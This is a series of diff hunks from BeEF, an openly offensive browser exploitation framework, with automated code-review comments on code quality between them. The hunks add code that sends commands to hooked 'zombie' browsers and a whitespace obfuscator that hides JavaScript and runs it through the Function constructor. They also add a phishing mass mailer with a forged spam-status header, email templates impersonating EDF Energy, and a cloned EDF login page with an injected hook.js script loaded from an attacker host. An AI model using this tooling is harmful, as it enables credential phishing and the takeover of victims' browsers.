# port = @@config.get("beef.http.websocket.port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port}
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket error: #{e}"
# end
# end
# }
#}
end
def start_websocket_server(ws_options, secure)
Thread.new {
sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
EventMachine.run {
EventMachine::WebSocket.start(ws_options) do |ws|
begin
print_debug "New WebSocket channel open."
secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
ws.onmessage { |msg|
msg_hash = JSON.parse("#{msg}")
#@note messageHash[result] is Base64 encoded
@@ -80,7 +219,6 @@ module BeEF
end
}
}
end
#@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +253,7 @@ module BeEF
handler = data["handler"]
if handler.match(/command/)
BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
else #processing results from extensions, call the right handler
data["beefhook"] = hooked_browser
data["results"] = JSON.parse(Base64.decode64(data["result"]))


@@ -62,9 +62,9 @@ module BeEF
raise Exception::TypeError, '"url" needs to be a string' if not url.string?
if args == nil
mounts[url] = http_handler_class
@mounts[url] = http_handler_class
else
mounts[url] = http_handler_class, *args
@mounts[url] = http_handler_class, *args
end
print_debug("Server: mounted handler '#{url}'")
end


@@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# append the number of command modules so the branch name results in: "<category name> (num)"
parent.each {|command_module_branch|
if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children')
num_of_command_modules = command_module_branch['children'].length
command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
num_of_subs = 0
command_module_branch['children'].each {|c|
#add in the submodules and subtract 1 for the folder node
num_of_subs+=c['children'].length-1 if c.has_key?('children')
retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder'
}
num_of_command_modules = command_module_branch['children'].length + num_of_subs
command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
end
}
end
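Review bot: The new total only looks one level down: `num_of_subs` adds `c['children'].length-1` for each direct child, so modules inside a folder nested two or more levels deep are not counted in the parent's "(num)" label, even though `retitle_recursive_tree([c])` retitles the sub-folder itself. `c.has_key?` is also called without the `is_a?(Hash)` guard the outer branch uses, so a non-Hash child would raise; `next unless c.is_a?(Hash)` at the top of the inner block would cover that. If deeper nesting can occur, having the recursive call return its leaf count and summing that would keep the totals consistent. The method starts above this hunk, so how `parent` is built is not visible here.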


@@ -16,13 +16,15 @@
beef:
extension:
evasion:
enable: true
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
scramble_variables: true
scramble_cookies: true
scramble:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble", "minify", "base_64"]
#chain: ["scramble", "minify"]
chain: ["minify", "base64", "whitespace"]


@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'
require 'extensions/evasion/obfuscation/whitespace'


@@ -0,0 +1,68 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Evasion
class Whitespace
include Singleton
def need_bootstrap
true
end
def get_bootstrap
# the decode function is in plain text - called IE-spacer - because trolling is always a good idea
decode_function =
"//Dirty IE6 whitespace bug hack
function IE_spacer(css_space) {
var spacer = '';
for(y = 0; y < css_space.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(css_space.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
spacer += String.fromCharCode(v);
}return spacer;
}"
end
def execute(input, config)
size = input.length
encoded = encode(input)
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
input
end
def encode(input)
output = input.unpack('B*')
output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ')
output
end
end
end
end
end
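Review bot: `encode` works only by calling `to_s` on the one-element array returned by `unpack('B*')` and then stripping brackets and quotes in the same `gsub`; that rendering differs between Ruby 1.8 and 1.9, and taking the string directly is clearer: `input.unpack('B*').first.tr('01', "\t ")`. The class has no comment describing the format, so a short header stating that each input byte becomes eight whitespace characters (tab for 0, space for 1, output eight times the input size) would help the next reader. `execute` should also carry a comment that the decoded text is run through `[].constructor.constructor`, i.e. the `Function` constructor, which a Content-Security-Policy without `'unsafe-eval'` blocks. The `config` parameter of `execute` is unused in this file.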


@@ -38,7 +38,11 @@ module Channels
config.oauth_token_secret = @config.get('beef.extension.notifications.twitter.oauth_token_secret')
end
Twitter.direct_message_create(username, message)
begin
Twitter.direct_message_create(username, message)
rescue
print "Twitter send failed, verify tokens have Read/Write/DM acceess..\n"
end
end
end
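Review bot: The bare `rescue` around `Twitter.direct_message_create` discards the exception, so every failure (network, rate limit, unknown recipient) is reported as a token problem and the real cause is lost. Capture it and log through the project's logger instead of `print`: `rescue => e` followed by `print_error "Twitter send failed (#{e.class}: #{e.message}); verify the tokens have Read/Write/DM access"`. That also fixes the `acceess` typo in the message. The enclosing method starts above this hunk.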


@@ -0,0 +1,58 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
extension:
social_engineering:
enable: true
name: 'Social Engineering'
authors: ["antisnatchor"]
web_cloner:
# NOTE: you must have 'wget' in your PATH
add_beef_hook: true
user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
mass_mailer:
# NOTE: you must have 'file' in your PATH
user_agent: "Microsoft-MacOutlook/12.12.0.111556"
host: "smtp.gmail.com"
port: 587
use_auth: true
use_tls: true
helo: "gmail.com" # this is usually the domain name
from: "youruser@gmail.com"
password: "yourpass"
# available templates
templates:
default:
# images are by default inline, so if you want to attach something, see 'attachments' below
images: ["beef_logo.png"]
images_cids:
cid1: "beef_logo.png"
attachments: ["beef_attachment.pdf"]
edfenergy:
# my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
# intercept POST requests) to be served with the web_cloner using use_existing = true
images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
images_cids:
cid1: "corner-tl.png"
cid2: "main.png"
cid3: "edf_logo.png"
cid4: "promo-corner-left.png"
cid5: "promo-corner-right-arrow.png"
cid6: "promo-reflection.png"
cid7: "2012.png"
cid8: "corner-bl.png"
cid9: "corner-br.png"
cid10: "bottom-border.png"
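Review bot: `mass_mailer.password` (together with `from`) keeps the SMTP account credential in plaintext in a tracked configuration file, so a real value is easy to commit or to leak with a copy of the repository. Mark both values as placeholders and say where a real credential should live, for example `# placeholder - keep real credentials out of version control` above `from:`. Note also that `use_tls: true` only enables encryption: the mailer added in this commit sets `OpenSSL::SSL::VERIFY_NONE`, which deserves a comment next to the key so operators do not assume the server is authenticated.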


@@ -0,0 +1,56 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module RegisterSEngHandler
def self.mount_handler(server)
server.mount('/api/seng', BeEF::Extension::SocialEngineering::SEngRest.new)
end
end
module SocialEngineering
extend BeEF::API::Extension
@short_name = 'social_engineering'
@full_name = 'Social Engineering'
@description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler')
end
end
end
# Handlers
require 'extensions/social_engineering/web_cloner/web_cloner'
require 'extensions/social_engineering/web_cloner/interceptor'
require 'extensions/social_engineering/mass_mailer/mass_mailer'
# Models
require 'extensions/social_engineering/models/web_cloner'
require 'extensions/social_engineering/models/interceptor'
#require 'extensions/social_engineering/models/mass_mailer'
# RESTful api endpoints
require 'extensions/social_engineering/rest/socialengineering'


@@ -0,0 +1,249 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class MassMailer
require 'net/smtp'
require 'base64'
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@config_prefix = "beef.extension.social_engineering.mass_mailer"
@templates_dir = "#{File.expand_path('../../../../extensions/social_engineering/mass_mailer/templates', __FILE__)}/"
@user_agent = @config.get("#{@config_prefix}.user_agent")
@host = @config.get("#{@config_prefix}.host")
@port = @config.get("#{@config_prefix}.port")
@helo = @config.get("#{@config_prefix}.helo")
@from = @config.get("#{@config_prefix}.from")
@password = @config.get("#{@config_prefix}.password")
end
# tos_hash is an Hash like:
# 'antisnatchor@gmail.com' => 'Michele'
# 'ciccio@pasticcio.com' => 'Ciccio'
def send_email(template, fromname, subject, link, linktext, tos_hash)
# create new SSL context and disable CA chain validation
if @config.get("#{@config_prefix}.use_tls")
@ctx = OpenSSL::SSL::SSLContext.new
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE # In case the SMTP server uses a self-signed cert, we proceed anyway
@ctx.ssl_version = "TLSv1"
end
n = tos_hash.size
x = 1
print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
print_info "subject: #{subject}"
print_info "link: #{link}"
print_info "linktext: #{linktext}"
# create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
smtp = Net::SMTP.new(@host, @port)
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
if @config.get("#{@config_prefix}.use_auth")
smtp.start(@helo, @from, @password, :login) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
else
smtp.start(@helo, @from) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
end
end
def compose_email(fromname, to, name, subject, link, linktext, template)
msg_id = random_string(50)
boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
images = ""
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
end
attachments = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
end
end
close = email_close(boundary)
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
end
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
headers = <<EOF
From: "#{fromname}" <#{from}>
Reply-To: "#{fromname}" <#{from}>
Return-Path: "#{fromname}" <#{from}>
X-Mailer: #{user_agent}
To: #{to}
Message-ID: <#{msg_id}@#{@host}>
X-Spam-Status: No, score=0.001 required=5
Subject: #{subject}
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=#{boundary}
This is a multi-part message in MIME format.
--#{boundary}
EOF
headers
end
def email_plain_body(plain_text, boundary)
plain_body = <<EOF
Content-Type: text/plain; charset="utf8"
Content-Transfer-Encoding:8bit
#{plain_text}
--#{boundary}
EOF
plain_body
end
def email_related(rel_boundary)
related = <<EOF
Content-Type: multipart/related;
boundary="#{rel_boundary}"
--#{rel_boundary}
EOF
related
end
def email_html_body(html_body, rel_boundary)
html_body = <<EOF
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
#{html_body}
--#{rel_boundary}
EOF
html_body
end
def email_add_image(name, path, rel_boundary)
file_encoded = [File.read(path)].pack("m") # base64 encoded
image = <<EOF
Content-Type: #{get_mime(path)};
name="#{name}"
Content-Transfer-Encoding: base64
Content-ID: <#{name}>
Content-Disposition: inline;
filename="#{name}"
#{file_encoded}
--#{rel_boundary}
EOF
image
end
def email_add_attachment(name, path, rel_boundary)
file_encoded = [File.read(path)].pack("m") # base64 encoded
image = <<EOF
Content-Type: #{get_mime(path)};
name="#{name}"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="#{name}"
#{file_encoded}
--#{rel_boundary}
EOF
image
end
def email_close(boundary)
close = <<EOF
--#{boundary}--
EOF
close
end
# Replaces placeholder values from the plain/html email templates
def parse_template(name, link, linktext, template_path, template)
result = ""
img_config = "#{@config_prefix}.templates.#{template}.images_cids"
img_count = 0
File.open(template_path, 'r').each do |line|
# change the Recipient name
if line.include?("__name__")
result += line.gsub("__name__",name)
# change the link/linktext
elsif line.include?("__link__")
if line.include?("__linktext__")
result += line.gsub("__link__",link).gsub("__linktext__",linktext)
else
result += line.gsub("__link__",link)
end
# change images cid/name/alt
elsif line.include?("src=\"cid:__")
img_count += 1
if line.include?("name=\"img__") || line.include?("alt=\"__img")
result += line.gsub("__cid#{img_count}__",
@config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
@config.get("#{img_config}.cid#{img_count}"))
else
result += line.gsub("__cid#{img_count}__",@config.get("#{img_config}.cid#{img_count}"))
end
else
result += line
end
end
result
end
def get_mime(file_path)
result = ""
IO.popen(["file", "--mime","-b", "#{file_path}"], 'r+') do |io|
result = io.readlines.first.split(";").first
end
result
end
def random_string(length)
output = (0..length).map{ rand(36).to_s(36).upcase }.join
end
end
end
end
end
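Review bot: `send_email` sets `@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE` unconditionally, so with `use_auth` enabled `@from` and `@password` are handed to whatever host completes the STARTTLS handshake; verification should default to `OpenSSL::SSL::VERIFY_PEER`, with an explicit opt-out setting for self-signed servers. The two TLS conditions also disagree: the context is built `if ...use_tls`, but `enable_starttls(@ctx)` runs `unless ...use_tls == false`, so a missing key calls it with `@ctx` still nil. `fromname`, `subject` and `to` are interpolated into the header heredoc in `email_headers` as-is and `template` is joined into a filesystem path in `compose_email`; both should be validated (reject CR/LF in header values, restrict `template` to the names configured under `templates`). Smaller points: `random_string` iterates `(0..length)` and so returns `length + 1` characters (`(0...length)` fixes it), and `parse_template` never closes the handle from `File.open(template_path, 'r')` (`File.foreach(template_path) do |line|` would).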

Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB


@@ -0,0 +1,21 @@
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Hi __name__,<br>
<br>
We would like to inform you that your BeEF order has been successful.<br>
You can check the status of your hook at the following link:<br>
<!-- be sure to have link and linktext placeholders on the same line, like the following: -->
<a href="__link__">__linktext__</a><br>
<br>
For convenience, we also attached a resume of your order as PDF.<br>
<br>
Regards,<br>
The BeEF team<br>
<!-- be sure to have different images on different lines, like the following: -->
<img src="cid:__cid1__" name="__img1__" alt="__img1__"><br>
<!--<img src="cid:cid2" name="img2" alt="img2"><br>-->
</body>
</html>


@@ -0,0 +1,10 @@
Hi __name__,
We would like to inform you that your BeEF order has been successful.
You can check the status of your hook at the following link:
__link__
For convenience, we also attached a resume of your order as PDF.
Regards,
The BeEF team

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.2 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 33 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.8 KiB


@@ -0,0 +1,54 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
<meta name="Generator" content="StreamServe MailOUT"><title>
</title><style type="text/css">P {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px;}</style>
</head><body><div><p><font face=MS Sans Serif color=#000000 size=1>
<table style="width:618px; border-collapse:collapse;">
<tr><td style="padding:28px; background-color: #ff5716;">
<table style="border-collapse:collapse; font-size:12px; width:562px;" cellpadding="0" cellspacing="0" border="0">
<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:top;">
<img src="cid:__cid1__" style="display:block; width:11px; height:11px;" />
</td><td colspan="2" style="width:379px; background-color:white;"></td>
<td rowspan="3" colspan="2" style="padding: 0px; margin:0px; line-height:0px; background-color:white; vertical-align:top;">
<img src="cid:__cid2__" style="display:block; width:155px; height:291px; " alt="Cityscape" /></td></tr>
<tr><td style="background-color:white;" rowspan="3"></td><td style="width:60px; vertical-align:top; background-color:white;">
<img src="cid:__cid3__" style="display:block; width:44px; height:65px;" alt="EDFEnergy" /></td>
<td style="width:315px; background-color:white;">
<h1 style="font-family: arial, sans-serif; font-weight:bold; font-size:16pt; color:#09357a; margin:0;">
Important information regarding your account</h1><br /></td></tr>
<tr><td colspan="2" style="font-family: arial, sans-serif; font-size:11pt; color:#434343; width:375px; background-color:white; vertical-align:top;" >
<p style="margin: 16px 0px 16px 0px;"><span style="color:#09357a; font-weight: bold; font-size:13pt;" >
Dear __name__</span></p><p style="margin-bottom:16px;">You have an important message regarding your EDF Energy account. </p>
<p style="margin-bottom:16px;">As this message contains confidential information you must
<a href="__link__" style="color: #013976;">click here</a> to view the message.</p>
<p style="margin-bottom:16px;">In order to read your messages you must be registered to MyAccount which you can do using the same link. </p>
<br/><table style="border-collapse:collapse; width:292px; padding:0px;"><tr>
<td style="width:11px; background-color:#09357a; padding:0px; vertical-align:top;">
<img src="cid:__cid4__"
style="display:block; width:11px; height:26px;" /></td>
<td style="background-color: #09357a; color:white; width:282px; padding:0 0 0 5px; font-family:Arial; font-weight:bold; font-size:10pt;">
<a href="__link__" style="color:white; text-decoration:none;">Continue to MyMessages</a></td>
<td style="width:27px; background-color:#09357a; padding:0px; vertical-align:top;">
<img src="cid:__cid5__" style="display:block; width:27px; height:26px;" /></td></tr>
<tr><td colspan="3" style="width:293px; padding:0px;">
<img src="cid:__cid6__" style="display:block; width:293px; height:9px;" />
</td></tr></table></td></tr><tr><td colspan="2" style="width:375px; background-color:white;"></td>
<td colspan="2" style="text-align:right;background-color:white;">
<img src="cid:__cid7__" style="display:block; float:right; width:95px; height:69px;" alt="London 2012" /></td></tr>
<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:bottom;">
<img src="cid:__cid8__" style="display:block; width:11px; height:11px;" /></td>
<td colspan="2" style="width:375px; background-color:white;"></td>
<td style="width:144px; background-color:white;">&nbsp;</td>
<td style="padding: 0px; margin:0px; line-height:0px; text-align:right; width:11px; background-color:white; vertical-align:bottom;">
<img src="cid:__cid9__" style="display:block; padding: 0px; margin: 0px; width:11px; height:11px;" />
</td>
</tr> </table></td></tr><tr>
<td style="padding: 0px;">
<img src="cid:__cid10__" style="display:block; width:618px; height:27px;" />
</td></tr><tr><td style="padding:15px 28px; background-color:#ffdecf;">
<p style="text-align:center; font-family: arial, sans-serif; font-weight:bold; font-size:9pt; color:#001f40;">
EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office is at 40 Grosvenor Place, London, SW1X 7EN,
incorporated in England and Wales. EDF Energy Customers plc. is a wholly owned subsidiary of EDF Energy plc.
The responsibility for performance of the supply obligations for all EDF Energy supply contracts rests with EDF Energy Customers plc.
<br /><br />The official Emblems of the London Organising Committee of the Olympic Games <br />and Paralympic Games Ltd are 2007 LOCOG. All rights reserved.</p></td></tr>
</table></font></p></font></div></body></html>


@@ -0,0 +1,19 @@
Important information regarding your account
Dear __name__
You have an important message regarding your EDF Energy account.
As this message contains confidential information you must click here to view the message:
__link__
In order to read your messages you must be registered to MyAccount which you can do using the same link:
__link__
EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office
is at 40 Grosvenor Place, London, SW1X 7EN, incorporated in England and Wales. EDF Energy Customers plc.
is a wholly owned subsidiary of EDF Energy plc. The responsibility for performance of the supply obligations
for all EDF Energy supply contracts rests with EDF Energy Customers plc.
The official Emblems of the London Organising Committee of the Olympic Games
and Paralympic Games Ltd are © 2007 LOCOG. All rights reserved.

Binary file not shown.

After

Width:  |  Height:  |  Size: 55 KiB


@@ -0,0 +1,790 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
<!-- EPCF: BOB Core -->
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
<script>
<!--
EPCM.relaxDocumentDomain();
EPCM.init( {
Version:7.00001620,
Level:1,
PortalVersion:"7.00.200908152330",
DynamicTop:false, // [service=true nestedWinOnAlias=false]
UAType:21, // [Mozilla]
UAVersion:5.0,
UAPlatform:1, // [Win]
UIPMode:"1", // [Default=1, User=0, Personalize=true]
UIPWinFeatures:"",
UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
UIPPopupComp:"",
UIPPopupCompSize:"",
UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
DBGException:false
} );
EPCM.DSM.init( {
TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
ForcedUserDebug:false,
KeepAliveActive:false,
KeepAliveDelta:840,
KeepAliveStopAfter:36000
} );
function SAPWP_receiveSessInfo( sessInfo, frameRef ){
EPCM.DSM.processSession( sessInfo, frameRef );
}
//-->
</script>
<!-- EPCF: EOB Core -->
<script type="text/javascript">
/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
</script>
<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1" TYPE="text/css" ><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1" TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head><body class="prtlBody urFontBaseFam urScrl">
<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
<Script>
var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
</Script>
<script>
var disableWorkProtectCheck = false;
function popupUnsavedDataBeforeUnload(evt)
{
if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
{
pageTitleBar.backForwardLink = false;
}
else
{
evt = (evt) ? evt : ((window.event) ? event : null);
if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
{
if(EPCM.getUAType() == EPCM.MSIE )
{
evt.returnValue = 'You have unsaved data';
}
else
{
evt.preventDefault();
evt.stopPropagation();
return 'You have unsaved data';
}
}
}
}
try{
if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
if (window==EPCM.getSAPTop()){
window.onbeforeunload = popupUnsavedDataBeforeUnload;
}
}
} catch(ex){}
